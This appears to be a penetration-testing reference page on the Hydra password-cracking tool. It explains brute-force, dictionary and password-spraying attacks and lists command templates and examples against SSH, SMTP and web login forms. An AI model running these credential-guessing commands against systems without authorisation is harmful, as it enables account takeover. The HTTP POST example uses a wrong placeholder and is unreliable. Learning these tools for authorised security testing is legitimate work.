Page cover

hydra

Hydra is a widely used password-cracking tool designed to perform brute-force attacks on various authentication services. It is highly efficient and supports a vast range of network protocols. Security professionals and penetration testers use Hydra to test the strength of password-based authentication mechanisms, helping organizations improve their security posture.

Types of Brute Force Attacks with Hydra

Hydra allows attackers and security researchers to conduct different types of brute-force attacks, including:

  • Dictionary Attack: Attempts to find valid username-password combinations using a predefined wordlist.

  • Password Spraying: Tries a single password across multiple usernames to avoid account lockouts.

  • Brute Forcing a Specific User's Password: Continuously tries different passwords for a specific user.

Key Parameters for Using Hydra

To use Hydra effectively, you need to specify the following:

  • The targeted protocol (SSH, FTP, HTTP, SMTP, etc.).

  • The dictionary files (wordlists) containing usernames and passwords.

  • The target IP or hostname where the attack will be performed.

Below are some common command formats for using Hydra against different services.

Basic Hydra Commands

Brute Forcing a Single User's Password

hydra -s <port> -l <user> -P <password list> <target> <protocol> -V

Example:

hydra -s 22 -l admin -P passwords.txt 192.168.1.1 ssh -V

Password Spraying (Multiple Users, One Password)

hydra -s <port> -L <user list> -p <password> <target> <protocol> -V

Example:

hydra -s 22 -L users.txt -p Welcome123 192.168.1.1 ssh -V

Dictionary Attack (Multiple Users and Passwords)

hydra -s <port> -L <user list> -P <password list> <target> <protocol> -V

Example:

hydra -s 22 -L users.txt -P passwords.txt 10.10.11.8 ssh -v

Advanced Hydra Usage

Brute Force Attack on an SMTP Server

hydra -l user@example.com -P passwords.txt smtp://192.168.1.100 -V

HTTP Brute Force Attacks

Hydra can be used to brute force login forms for web applications. The following examples show HTTP GET and POST attacks:

HTTP GET Form Attack

hydra -l admin -P 500-worst-passwords.txt 10.10.29.110 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

HTTP POST Form Attack

hydra -L users.lst -P /path/to/wordlist.txt http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username"
PreviouspcredzNextjohn

Last updated